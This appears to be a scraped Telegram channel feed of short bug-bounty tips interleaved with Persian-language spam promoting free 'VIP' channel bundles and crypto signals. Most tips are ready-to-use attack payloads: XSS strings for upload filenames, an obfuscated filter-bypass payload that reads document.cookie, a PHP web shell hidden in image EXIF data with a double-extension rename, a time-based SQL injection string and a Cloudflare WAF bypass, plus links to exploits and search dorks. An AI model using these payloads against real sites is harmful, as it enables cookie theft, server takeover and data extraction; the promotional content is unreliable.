💠عضویت = دسترسی به کلی کانال کاربردی.فقط یه کلیک کافیه!
🔸/channel/addlist/-8ouei0L4LwzNjNk
👑 پکیجی کامل از بهترین کانال های تلگرام به صورت تخصصی براتون جمع آوری کردیم ، که تصمیم گرفتیم به مدت 2 ساعت #رایگان در اختیار شما عزیزان قرار بدیم.👇
ظرفیت محدود👇
🗒 File Upload via XSS
If you found a file upload function for an image, try introducing an image with XSS in the filename like so:
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
🗒 Bypass XSS Filter with Array
<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>">
🗒 Bypass File Upload Filtering
In image:
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>'
shell.jpg
mv shell.jpg shell.php.jpg
🗒 MetaMask Subdomain Takeover (Consensys) | $500 Bug Bounty Poc | Subdomain Takeover Method
https://youtu.be/xP-u9i3N-3U?si=ooLVhCem9w5aSWos
@PenTest_Tm
@cryptosignalsfree12
بچهایی که تو کار کریپتو هستن میتونید استفاده کنید
🗒 Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
🗒 Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
آسیب پذیری RCE از افزونه وردپرسیه Background Image CROPPER ورژن 1.2
https://www.exploit-db.com/exploits/51998
@PenTest_Tm
🗒 Bug Bounty Cheat Sheets
SSRF
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md
CRLF
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md
@PenTest_Tm
👑 به پاس حمایت های فراوان شما دوستان عزیز کانال های (VIP) تلگرام رایــــگان شد.👇👇
📰عضو شو ظرفیت محدوده📰
✈️Link VIP : /channel/addlist/-8ouei0L4LwzNjNk
➕این فرصت استثنائی رو از دست نده
ورود به چنل VIP 👇
ورود چنل VIP سیگنال های رایگان.
⭐️ اگه برنامه نویسی ، دانشجویی یا دنبال یادگیری هستی که به درامد برسی بیا اینجا . . .
🔸/channel/addlist/ktmNFMWD_OhhMjY0
🗒 SQL Injection
After this, use sqlmap to extract the database
-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--
🗒 XSS Payload Generator
تولید Payload با سناریو های مختلف و پشتیبانی از انواع متد با قابلیت ساخت پیلود برای دور زدن WAF و همچنین مبهم سازی پیلود و اضافه کردن کد جاوااسکریپت برای ساخت پیلود های پیشرفته تر و فیلتر پیشرفته کاراکترها برای دور زدن محدودیت هایی که هست
@PenTest_Tm
🗒SSTI - RCE - CI
https://dolomite-slip-02b.notion.site/SSTI-RCE-CI-76c2f9d2808649c197d08b0d0ecd0e5b?pvs=25
@PenTest_Tm
🗒 How I was able to discover ATO Via IDOR vulnerability
0x_xnum/idor-leads-to-account-takeover-of-all-users-ato-27af312c8481" rel="nofollow">https://medium.com/@0x_xnum/idor-leads-to-account-takeover-of-all-users-ato-27af312c8481
@PenTest_Tm
🗒 Optimizing Blind SQL Injection Detection with Content-Length Differences
https://bountysecurity.ai/blogs/news/optimizing-blind-sql-injection-detection-with-content-length-differences
@PenTest_Tm
🗒 Bypass Upload Tricky
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files
@PenTest_Tm
GIT files Dorks
Universal for Google, Bing etc
https://github.com/Proviesec/google-dorks/blob/main/google-dorks-for-git-files.txt
Bug Bounty Dorks
Universal for Google, Bing etc
https://github.com/hackingbharat/bug-bounty-dorks-archive/blob/main/bbdorks
@PenTest_Tm
🗒 XSS Bypass Cloudflare WAF
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
@PenTest_Tm